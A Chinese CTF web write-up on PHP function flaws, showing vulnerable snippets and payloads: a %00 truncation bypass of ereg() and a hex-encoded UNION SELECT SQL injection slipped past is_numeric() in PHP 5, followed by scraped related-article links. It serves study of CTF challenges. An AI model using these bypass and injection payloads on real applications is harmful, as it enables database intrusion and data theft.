CTF web题总结--php函数漏洞
php函数漏洞总结
1、ereg()截断漏洞
代码:
<?php
session_start();
if (isset($_POST['submit'])) {$verifycode = $_POST['verifycode'];$b = false;if (@ereg("^[1-9]+$", $verifycode) === FALSE){$b = false;echo 'b is false';}else if (strpos($verifycode, 'xiaoboshifudaiwofei') !== FALSE) {$b = true;echo 'b is true';}
}
?>
payload:
9%00xiaoboshifudaiwofei
2、is_numeric()漏洞
代码:
if(!is_numeric($page)){die("page must be a number!"); }if($page<1) $page=1;$sql="update page set num=$page";$res=mysql_my_query($sql);if($res){echo "<script>alert('update success!');</script>";echo("<script>location.href='./index.php?action=admin&mode=index'</script>");}else{echo "<script>alert('update fail!');</script>";die();}
php 5.x 版本中 is_numeric 的缺陷 (php7.0 已经修复了 ), 它认为 0x…. 是整数
import binascii
a='1 union all select flag,flag,flag,flag from flags'
binascii.hexlify(a)
3120756e696f6e20616c6c2073656c65637420666c61672c666c61672c666c61672c666c61672066726f6d20666c616773
page:
0x3120756e696f6e20616c6c2073656c65637420666c61672c666c61672c666c61672c666c61672066726f6d20666c616773
CTF web题总结--php函数漏洞相关推荐
- CTF Web题 部分WP
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002 ...
- i春秋python_i春秋CTF web题(1)
之前边看writeup,边做实验吧的web题,多多少少有些收获.但是知识点都已记不清.所以这次借助i春秋这个平台边做题,就当记笔记一样写写writeup(其实都大部分还是借鉴其他人的writeup). ...
- hxp 36C3 CTF Web题 WriteupBin Writeup (Selenium模拟点击+Content Security Policy+Nonce+Parsley.js触发错误提示)
WriteupBin – A web challenge from hxp 36C3 CTF https://ctftime.org/event/825 题目部署 本地搭建: 解压WriteupBin ...
- CTF web题总结--LFI
本地文件包含漏洞(Local File Include),是php的include()函数存在设计缺陷,学习链接:php文件包含漏洞总结 题目的url都是类似这种: http://127.0.0.1/ ...
- CTF web题 wp:
1.签到题 火狐F12查看源码,发现注释: 一次base64解码出flag 2.Encode 在这里插入图片描述 和第一题界面一样?? 轻车熟路f12: 发现编码: 格式看上去是base64,连续两次 ...
- mysql 南邮ctf_南邮ctf web题记录(上)
1.签到题 f12看源码就行了. md5 collision 题目贴出了源码,按照题意,a不等于QNKCDZO但是md5与QNKCDZO的md5相等时就可以获得flag. 如果两个字符经MD5加密后的 ...
- CTF pwn题之格式化字符串漏洞详解
格式化字符串漏洞详解 概念 如何利用 基本利用方式讲解 常用payload总结 pwntools -- FmtStr类 求偏移 地址泄露 任意地址写 一个例子 总结 概念 格式化字符串漏洞的成因在 ...
- CTF Web题部分PHP魔术方法总结(Magic Methods)
几个常见的PHP魔术方法 简单介绍 详细介绍 __sleep() __wakeup() __get() __set() __isset() __unset() __construct() __dest ...
- CTF web题总结--unserizable
php的反序列化漏洞 代码: <?php class Person {private static $defaults = ['name' => null,'gender' => n ...
最新文章
- 基于matlab的64QAM,通信调制体制设计之64QAM性能分析MATLAB仿真及代码
- 关节点(atriculation point)算法
- 游戏外挂的基本编写原理
- saveas java_在SaveAs之后Excel崩溃
- vc设备工程师_4注册公用设备工程师专业基础考试真题.
- Ubuntu Linux将支持所有树莓派设备
- html代码大全贴音乐,网页音乐代码大全
- 我大学时代的好朋友要结婚了!
- 【交换机在江湖】第十二章 VLAN基础篇
- boost升压电路原理
- 云锵基金 2019 年 03 月简报
- GeForce Experience 安装时乱码解决
- easypanel b.php,easypanel 免费主机面板
- (一)大数据学习引言——大数据概述
- CVPR 2022 | 浙大提出Oriented RepPoints:旋转目标检测网络
- 龙星镖局 | 2015 机器学习颁奖礼
- HCI-人机交互概论 (一)
- ubuntu软件:录制视频和截图工具,压缩视频
- BUUCTF:文件中的秘密
- 【监控施工项目必备】
热门文章
- python可以做什么工作好-学完Python我们可以做什么工作?
- python基础题-python基础练习题(一)
- python3项目-把项目从Python2.x移植到Python3.x的经验总结
- python 实现81个人脸关键点实时检测
- open source license主流的开源软件协议介绍
- LeetCode Queue Reconstruction by Height(贪心)
- 程序员保值的五个关键点
- (转)SSL/TLS 漏洞“受戒礼”,RC4算法关闭
- phpstudy升级5.7
- MySQL中函数CONCAT及GROUP_CONCAT